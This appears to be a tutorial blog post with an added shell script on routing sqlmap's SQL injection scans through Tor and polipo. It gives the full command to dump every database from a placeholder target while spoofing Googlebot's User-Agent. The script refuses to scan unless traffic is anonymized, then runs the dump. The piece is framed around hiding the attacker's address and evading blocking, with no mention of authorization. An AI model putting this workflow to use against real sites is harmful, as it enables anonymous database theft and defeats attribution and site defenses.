There is no better tool at the moment for blind SQL injection than sqlmap. If you don't use it yet, you should definitely have a look at it. With the latest additions sqlmap supports Tor through a command line switch, --tor. Let's proceed with the installation. My system is Debian/Ubuntu based; on other distributions the steps are the same apart from the package manager. Following the instructions at https://www.torproject.org/docs/debian.html.en#ubuntu :
Add this line to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org <DISTRIBUTION> main
where you put the codename of your distribution (e.g. lenny, sid, maverick) in place of <DISTRIBUTION>.
Then add the gpg key used to sign the packages by running the following commands at your command prompt (the export uses the full fingerprint, so the key handed to apt-key is pinned to it rather than to the short ID 886DDD89, which is far easier to collide):
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Now refresh your sources and install Tor by running the following commands (as root) at your command prompt:
apt-get update
apt-get install tor tor-geoipdb
Start Tor with /etc/init.d/tor start. Then grab a copy of the polipo config file from https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf (install polipo first with apt-get install polipo if it is not there yet), back up the existing /etc/polipo/config by renaming or moving it, put the configuration from the URL in its place, and restart polipo with /etc/init.d/polipo restart. This step is not cosmetic: a stock polipo is a plain caching HTTP proxy, and only a config that sets socksParentProxy to Tor's SOCKS port (127.0.0.1:9050) makes it forward through Tor. The --tor switch as used here expects an HTTP proxy on port 8123, polipo's default, so with the wrong config sqlmap happily talks to polipo and the scan leaves your machine in the clear.
Get sqlmap from the latest svn trunk using
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap
(sqlmap development has since moved to git at https://github.com/sqlmapproject/sqlmap; the --tor switch is still there.)
Now you can use sqlmap with --tor with the following command (quote the URL so the shell does not try to glob the ?):
~/sqlmap# ./sqlmap.py -u 'http://URL/index.php?cata_id=1' --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Your requests now reach the site from a Tor exit node and carry Googlebot's User-Agent. Be clear about what that buys you: the target's logs show the exit node's address instead of yours, and the header may get you past blocking that keys on User-Agent alone, but it does not make you look like Googlebot to anyone who checks, because Google tells site owners to verify Googlebot by reverse DNS on the source address, and a Tor exit never resolves to googlebot.com. Newer sqlmap also has --check-tor, which asks check.torproject.org whether the traffic really arrives through Tor before anything is sent to the target; use it, since a misconfigured polipo fails open and sends the scan straight from your own IP.
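The whole chain in one place, as an added example that is not from the original post and not sqlmap's or Tor's own code: a POSIX shell script that writes a minimal polipo config chained to Tor, refuses to start if the config on disk does not point polipo at Tor's SOCKS port, confirms through check.torproject.org that traffic actually exits via Tor, and only then builds and runs the sqlmap command above. It assumes polipo on 127.0.0.1:8123 and Tor's SOCKS port on 9050 (both defaults), sqlmap checked out in ~/sqlmap, and a placeholder target URL; the polipo lines are the handful that matter for the Tor chain, not a copy of the Tor Browser file linked above.

```shell
#!/bin/sh
# Added example, not code from the original post or from sqlmap/Tor.
# Assumptions: polipo listens on 127.0.0.1:8123, Tor's SOCKS port is 9050,
# sqlmap is checked out in ~/sqlmap, and the target URL is a placeholder.

TOR_SOCKS="localhost:9050"
POLIPO_PORT=8123
UA="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Minimal polipo config that forwards every request to Tor's SOCKS port.
# Without socksParentProxy polipo is just a caching proxy and the scan
# would leave the box directly. diskCacheRoot="" keeps responses (and the
# injection payloads embedded in their URLs) off the disk.
write_polipo_config() {            # $1 = path to write
    cat > "$1" <<EOF
proxyAddress = "127.0.0.1"
proxyPort = $POLIPO_PORT
allowedClients = 127.0.0.1
socksParentProxy = "$TOR_SOCKS"
socksProxyType = socks5
diskCacheRoot = ""
disableLocalInterface = true
EOF
}

# Returns 0 only if the config on disk really chains polipo to Tor.
polipo_chains_to_tor() {           # $1 = path of polipo config
    grep -Eq '^[[:space:]]*socksParentProxy[[:space:]]*=[[:space:]]*"?(localhost|127\.0\.0\.1):9050"?' "$1" &&
    grep -Eq '^[[:space:]]*socksProxyType[[:space:]]*=[[:space:]]*socks5' "$1"
}

# Build the sqlmap command line. The URL is single-quoted so '?' and '&'
# survive the shell; --tor-type/--tor-port pin sqlmap to polipo's HTTP
# port even on versions whose --tor default is SOCKS5; --check-tor makes
# sqlmap confirm the Tor path itself before touching the target.
build_sqlmap_cmd() {               # $1 = target URL, $2 = sqlmap directory
    printf "%s/sqlmap.py -u '%s' --dump-all --tor --tor-type=HTTP --tor-port=%s --check-tor --user-agent='%s'\n" \
        "$2" "$1" "$POLIPO_PORT" "$UA"
}

# Live check (needs network): check.torproject.org/api/ip answers
# {"IsTor":true,...} only when the request arrived through a Tor exit.
verify_tor_exit() {
    curl -s --proxy "http://127.0.0.1:$POLIPO_PORT" https://check.torproject.org/api/ip |
        grep -q '"IsTor":true'
}

# Usage: sh sqlmap_tor.sh run   (without "run" the script only defines the functions)
if [ "${1:-}" = "run" ]; then
    polipo_chains_to_tor /etc/polipo/config ||
        { echo "polipo is not chained to Tor's SOCKS port, refusing to scan" >&2; exit 1; }
    verify_tor_exit ||
        { echo "traffic is not exiting through Tor, refusing to scan" >&2; exit 1; }
    eval "$(build_sqlmap_cmd 'http://URL/index.php?cata_id=1' "$HOME/sqlmap")"
fi
```

Both gates fail closed on purpose: the config check catches the stock polipo that never heard of Tor, and the live check catches a polipo that is configured correctly but whose Tor daemon is down or not yet bootstrapped, in which case polipo would otherwise just serve the request itself.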